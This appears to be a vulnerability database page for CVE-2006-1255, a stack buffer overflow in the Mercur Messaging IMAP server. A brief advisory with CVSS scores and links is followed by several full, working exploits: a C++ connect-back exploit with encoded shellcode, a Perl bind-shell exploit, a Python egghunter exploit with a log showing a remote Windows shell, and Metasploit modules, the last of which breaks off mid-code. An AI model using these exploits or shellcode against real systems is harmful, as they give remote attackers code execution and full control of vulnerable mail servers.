CVE-2006-1255
CVSS 10.0
Published: 2006-03-18 20:02:00
Revised: 2011-03-07 21:32:34

[Original] Stack-based buffer overflow in the IMAP service in Mercur Messaging 5.0 SP3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long string to the (1) LOGIN or (2) SELECT command, a different set of attack vectors and possibly a different vulnerability than CVE-2003-1177.


[CNNVD] Mercur Messaging IMAP Service Buffer Overflow Vulnerability (CNNVD-200603-291)

        Mercur Messaging 2005 is mail server software for Windows NT4, 2000 and XP that supports all current RFC standards for POP3, IMAP4 and SMTP.
        Mercur Messaging 2005 has a boundary-condition error in its handling of IMAP commands: a remote attacker can send over-long arguments to the LOGIN and SELECT commands, triggering a stack overflow and causing a denial of service.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a total system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: NETWORK [the attacker needs neither internal-network nor local access]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1255
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1255
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-291
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/25290
(UNKNOWN)  XF  mercur-imap-bo(25290)
http://www.vupen.com/english/advisories/2006/0977
(UNKNOWN)  VUPEN  ADV-2006-0977
http://www.securityfocus.com/bid/17138
(UNKNOWN)  BID  17138
http://www.osvdb.org/23950
(UNKNOWN)  OSVDB  23950
http://secunia.com/advisories/19267
(VENDOR_ADVISORY)  SECUNIA  19267
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/043972.html
(UNKNOWN)  FULLDISC  20060316 Re: Mercur IMAPD 5.0 SP3 DoS Exploit or more?

- Vulnerability information

Mercur Messaging IMAP Service Buffer Overflow Vulnerability
Critical  Buffer overflow
2006-03-18 00:00:00 2007-05-01 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade patch to fix this security issue; patch download link:
        http://www.atrium-software.com/index.php?content=mercur&lframe=navigation&rframe=navmercur&lang=en

- Vulnerability information (1592)

Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (EDBID:1592)
windows remote
2006-03-19 Verified
0 pLL
N/A [Download]
/*
 * mercur.cpp
 *
 * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
 * Copyright (C) 2006 Javaphile Group
 * http://www.javaphile.org
 *
 * Exploits code by : pll Ellison.Tang[at]gmail[dot]com
 *
 * Bug Reference:
 * http://www.frsirt.com/bulletins/4332
 *
 */

#include <stdio.h>
#include <ctype.h>    /* isupper / _tolower used in PrintSc */
#include <time.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

SOCKET ConnectTo(char *ip, int port)
{
	WSADATA	wsaData;
	SOCKET	s;
	struct	hostent		*he;
	struct	sockaddr_in	host;
	int		nTimeout=150000;

	if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
	{
		printf("[-]WSAStartup failed.\n");
		exit(-1);
	}

	if((he=gethostbyname(ip))==0)
	{
		printf("[-]Failed to resolve '%s'.", ip);
		exit(-1);
	}

	host.sin_port=htons(port);
	host.sin_family=AF_INET;
	host.sin_addr=*((struct in_addr *)he->h_addr);

	if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		printf("[-]Failed creating socket.");
 		exit(-1);
 	}

	if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
	{
		closesocket(s);
		printf("[-]Failed connecting to host.\n");
		exit(-1);
	}
	setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
	return s;
}


void Disconnect(SOCKET s)
{
	closesocket(s);
	WSACleanup();
}

void PrintSc(unsigned char *sc, int len)
{
    int    i,j;
    char *p;
    char msg[6];

    //printf("/* %d bytes */\n", buffsize);

    // Print general shellcode
    for(i = 0; i < len; i++)
    {
        if((i%16)==0)
        {
            if(i!=0)
                printf("\"\n\"");
            else
                printf("\"");
        }

        //printf("\\x%.2X", sc[i]);

        sprintf(msg, "\\x%.2X", sc[i] & 0xff);

        for( p = msg, j=0; j < 4; p++, j++ )
        {
            if(isupper(*p))
                printf("%c", _tolower(*p));
            else
                printf("%c", p[0]);
        }
    }

    printf("\";\n");
}

void main(int argc,char* argv[])
{

	struct OSTYPE
	{
		unsigned int ret;
		char des[255];
	};

	OSTYPE os[] = {
		{0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
		{0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
		{0xDDDDDDDD, "Debug"},
		{0, NULL}
	};

	unsigned char shellcode[]=
	/* ip offset: 71 + 21 = 92 */
	/* port offset: 78 + 21 = 99 */
	/* 21 bytes decode */
	"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
	"\xe8\xed\xff\xff\xff"
	/* 254 bytes shellcode, xor with 0xee */
	"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
	"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
	"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
	"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
	"\x84\xec\x11\xb8\xfe\x7d\x86"
	"\x91\xee\xee\xef"				//ip
	"\x86"
	"\xec\xee"
	"\xee\xdb"						//port
	"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
	"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
	"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
	"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
	"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
	"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
	"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
	"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
	"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
	"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
	"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

	unsigned char FindSc[]=
	"\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B"
	"\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50"
	"\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74"
	"\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7"
	"\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01"
	"\x04\x13\x33\xC0\xC3"
	"\x90\x90\x90\x90"
	"\xEB\xA5";


	if(argc < 5)
	{
		printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n");
		printf("-------------------------------------------\n");
		printf("Usage:\n");
		printf("   %s <Victim> <Connect back IP> <Connect back Port> <OsType>\n", argv[0]);
		printf("\nType could be:\n");

		int i=0;
		while(os[i].ret)
		{
			printf(" [%d]  %s\n", i, os[i].des);
			i++;
		}
		return;
	}

	SOCKET	s=ConnectTo(argv[1],143);

	printf("[+]Connected to target...");

	char szRecvBuff[600] = {0};

	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
	{
		printf("failed!\n");
		return;
	}
	else
	{
		printf("done!\n");
	}

//	printf("%s\n",szRecvBuff);

	if(strstr(szRecvBuff, "MERCUR") == NULL)
	{
		printf("[-]Seems not IMAP running.\n");
		printf("Quiting...");
		return;
	}
	else
	{
		printf("[*]Seems IMAP running.\n");
	}

	unsigned long dwCbIp=inet_addr(argv[2]);

	unsigned short q=(unsigned short)atoi(argv[3]);
	unsigned short dwCbPort=(unsigned short)q;

	dwCbIp=dwCbIp^0xEEEEEEEE;
	dwCbPort=dwCbPort^0xEEEE;

	shellcode[92] =(char) (dwCbIp & 0x000000FF);
	shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
	shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
	shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);

	shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
	shellcode[100] =(char) (dwCbPort & 0x000000FF);

	char	szUserName[20]={0};
	printf("[?]Username:");
	gets(szUserName);

	char	szPassWord[20]={0};
	printf("[?]Passwd:");
	gets(szPassWord);

	char	szLogin[]=" login ";
	char	szLoginInfo[50]={0};
	unsigned char	szSpace=0x20;
	char szEnd[]="\r\n";

	memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
	int		dwLen=lstrlen(szUserName);
	memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
	dwLen+=lstrlen(szLogin);
	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
	dwLen+=lstrlen(szPassWord);
	memcpy(szLoginInfo+dwLen,&szSpace,1);
	dwLen++;
	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
	dwLen+=lstrlen(szPassWord);
	memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));

//	printf("%s\n",szLoginInfo);

	printf("[+]Sending Login Info...");

	send(s,szLoginInfo,lstrlen(szLoginInfo),0);

	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
	{
		printf("failed!\n");
		return;
	}
	else
	{
		printf("done!\n");
	}

//	printf("%s\n",szRecvBuff);

	if(strstr(szRecvBuff, "OK") == NULL)
	{
		printf("[-]Seems not a valid user or not support IMAP.\n");
		printf("Quiting...");
		return;
	}
	else
	{
		printf("[*]Seems a valid user.\n");
	}

	char	szSelect[]=" select ";
	char	szMagicData[1000]={0};

	memset(szMagicData,'A',sizeof(szMagicData)-1);
	memcpy(szMagicData,szUserName,lstrlen(szUserName));
	memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);

	int p=atoi(argv[4]);
	*(unsigned int *)&FindSc[85] = os[p].ret;

	memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);

	memcpy(szMagicData+251,szEnd,sizeof szEnd-1);

	char	szAdog[]="AGOU";
	memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
	memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
	memcpy(szMagicData+261,shellcode,sizeof shellcode-1);

	memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);

	printf("[+]Sending Magic Data To server...Good Luck!\n");
	send(s,szMagicData,sizeof szMagicData-1,0);

	recv(s,szRecvBuff,sizeof(szRecvBuff),0);
	printf("%s\n",szRecvBuff);

	Disconnect(s);
	printf("[?]Sending finished...Good luck!\n");
}

// milw0rm.com [2006-03-19]
		

- Vulnerability information (3133)

Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit (EDBID:3133)
windows remote
2007-01-15 Verified
143 Jacopo Cervini
[Download] [Download]
#!/bin/perl
# tested on win2k server SP4 English
# ATTENTION! If you have an another valid account you must change the offsets this is only a poc
#

use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 143;
my $reply;
my $request;
my $user = "test";
my $pass = "test";

my $nop = "\x90"x8;

my $nop1 = "\x90"x20;

my $ret = "\x42\xb2\xc1\x40";

#my $ret = "\x42\x42\x42\x42"; #call edi in mcrimap4.exe

my $asm="\x8b\xc7\x83\xc0\x23\x50\xc3";

#	asm is a binary translation of these assembly instructions;eax now have the correct memory address for shellcode
#
#	8BC7           MOV EAX,EDI
#	83C0 23        ADD EAX,23
#	50             PUSH EAX                                
#	C3             RETN




#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host


my $shellcode = 
"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "a001 LOGIN $user $pass\r\n";

send $socket, $request, 0;
print "[+] Sent login\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = " SELECT " . $nop . $asm . $nop1 . $shellcode . $ret ."\r\n";

send $socket, $request, 0;
print "[+] Sent chunk\n";

print " + Connect on port 4444 of $host ...\n";
system("telnet $host 4444");

close $socket;
exit;

# milw0rm.com [2007-01-15]
		

- Vulnerability information (3540)

Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod) (EDBID:3540)
windows remote
2007-03-21 Verified
143 muts
[Download] [Download]
#!/usr/bin/python
# 
# Mercur Messaging 2005 SP3 IMAP service - Egghunter mod
# muts@offensive-security.com
# http://www.offensive-security.com
# Original exploit by Winny Thomas
# Thanks Thomas, this code really came in handy !
# VMWare seems to alter the stack a bit as the offset 
# of the EIP overwrite was a few bytes off (Windows XPsp2).
# You can inject more than 2000 bytes using an IMAP command (I chose LIST), 
# and then let the egghunter do the rest of the work.
# The initial injected buffer gets cut off, so you need to double check that.
# 
# bt ~ # ./imap.py 192.168.0.75 test test
# * OK MERCUR IMAP4-Server (v5.00.14 Unregistered) for Windows ready at Thu, 22 Mar 2007 00:59:19 +0200
# a001 OK LOGIN completed
# BAD Command unknown
# Shell on port 4444
# 
# bt ~ # nc -v 192.168.0.75 4444
# 192.168.0.75: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.75] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# 
# C:\WINDOWS\system32>

 

import os
import sys
import time
import socket
import struct

# Place our w00tw00t egghunter in nop heaven

shellcode = "\x90" * 92 
shellcode +="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
shellcode +="\x90" * 100
 
# Place w00t and bindshell in correct place in LIST command.

bindshell = "\x90" * 320
bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57" 

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")

# Pad the injected command

bindshell +="\xcc" * 1000

def ExploitMercur(target, username, passwd):
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((target, 143))
	response = sock.recv(1024)
	print response
	login = 'a001 LOGIN ' + username + ' ' + passwd + '\r\n'
	sock.send(login)
	response = sock.recv(1024)
	print response
	imaplist = 'a001 LIST ' + bindshell + '\r\n'
	sock.send(imaplist)
	response = sock.recv(1024)
	print response
	payload = shellcode
	payload += 'L' * 1
	payload += 'Y' * 4
	payload += 'Z' * 4
#	01883A50	FFD3	CALL EBX	MCRFAX.DLL
	payload += struct.pack('<L', 0x01883A50)
	payload += 'L' *  27
	payload += 'M' *  16
	payload += ' ' + '\"/\"' + ' ' + '\"\"'
	req = 'a001 SUBSCRIBE ' + payload + '\r\n'
	sock.send(req)
	sock.close()
	print 'Shell on port 4444'

def ConnectRemoteShell(target):
	connect = "/usr/bin/telnet " + target + " 4444"
	os.system(connect)

if __name__=="__main__":
	try:
		target = sys.argv[1]
		username = sys.argv[2]
		passwd = sys.argv[3]
	except IndexError:
		print 'Usage: %s <imap server> <username> <password>\n' % sys.argv[0]
		sys.exit(-1)
	ExploitMercur(target, username, passwd)

# milw0rm.com [2007-03-21]
		

- Vulnerability information (16476)

Mercur v5.0 IMAP SP3 SELECT Buffer Overflow (EDBID:16476)
windows remote
2010-09-20 Verified
0 metasploit
N/A [Download]
##
# $Id: mercur_imap_select_overflow.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
			'Description'    => %q{
					Mercur v5.0 IMAP server is prone to a remotely exploitable
				stack-based buffer overflow vulnerability. This issue is due
				to a failure of the application to properly bounds check
				user-supplied data prior to copying it to a fixed size memory buffer.
				Credit to Tim Taylor for discovering the vulnerability.
			},
			'Author'         => [ 'Jacopo Cervini <acaro [at] jervus.it>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2006-1255' ],
					[ 'OSVDB', '23950' ],
					[ 'BID', '17138' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 Server SP4 English',  { 'Offset' => 126, 'Ret' => 0x13e50b42 }],
					['Windows 2000 Pro SP1 English',     { 'Offset' => 127, 'Ret' => 0x1446e242 }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 17 2006'))

	end

	def exploit
		sploit =  "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"
		sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])
		sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8)
		sploit << payload.encoded + rand_text_alpha_upper(453)

		info = connect_login

		if (info == true)
			print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)
			sock.put(sploit + "\r\n")
		else
			print_status("Not falling through with exploit")
		end

		handler
		disconnect
	end
end
		

- Vulnerability information (16481)

Mercur Messaging 2005 IMAP Login Buffer Overflow (EDBID:16481)
windows remote
2010-08-25 Verified
0 metasploit
N/A [Download]
##
# $Id: mercur_login.rb 10150 2010-08-25 20:55:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercur Messaging 2005 IMAP Login Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.
				Since the room for shellcode is small, using the reverse ordinal payloads
				yields the best results.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10150 $',
			'References'     =>
				[
					[ 'CVE', '2006-1255' ],
					[ 'OSVDB', '23950' ],
					[ 'BID', '17138' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 228,
					'BadChars' => "\x00\x20\x2c\x3a\x40",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP Pro SP2 English',   { 'Ret' => 0x77dc15c0 } ],
				],
			'DisclosureDate' => 'Mar 17 2006',
			'DefaultTarget'  => 0))

		register_options( [ Opt::RPORT(143) ], self.class )
	end

	def exploit
		connect
		sock.get_once

		hunter  = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
		egg     = hunter[1]

		sploit	=  "A001 LOGIN " + egg + hunter[0]
		sploit	<< [target.ret].pack('V') + [0xe9, -175].pack('CV')

		print_status("Trying target #{target.name}...")
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
		

- Vulnerability information (F83031)

Mercur Messaging 2005 IMAP Login Buffer Overflow (PacketStormID:F83031)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,imap,shellcode
CVE-2006-1255
[Download]

This Metasploit module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Mercur Messaging 2005 IMAP Login Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3.
				Since the room for shellcode is small, using the reverse ordinal payloads
				yields the best results.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-1255' ],
					[ 'OSVDB', '23950' ],
					[ 'BID', '17138' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},			
			'Payload'        =>
				{
					'Space'    => 228,
					'BadChars' => "\x00\x20\x2c\x3a\x40",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",	
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP Pro SP2 English',   { 'Ret' => 0x77dc15c0 } ],
				],
			'DisclosureDate' => 'Mar 17 2006',
			'DefaultTarget'  => 0))

			register_options( [ Opt::RPORT(143) ], self.class )
	end

	def exploit
		connect
		sock.get_once

		hunter  = generate_egghunter()
		egg     = hunter[1]

		sploit	=  "A001 LOGIN " + egg + egg + payload.encoded + hunter[0]
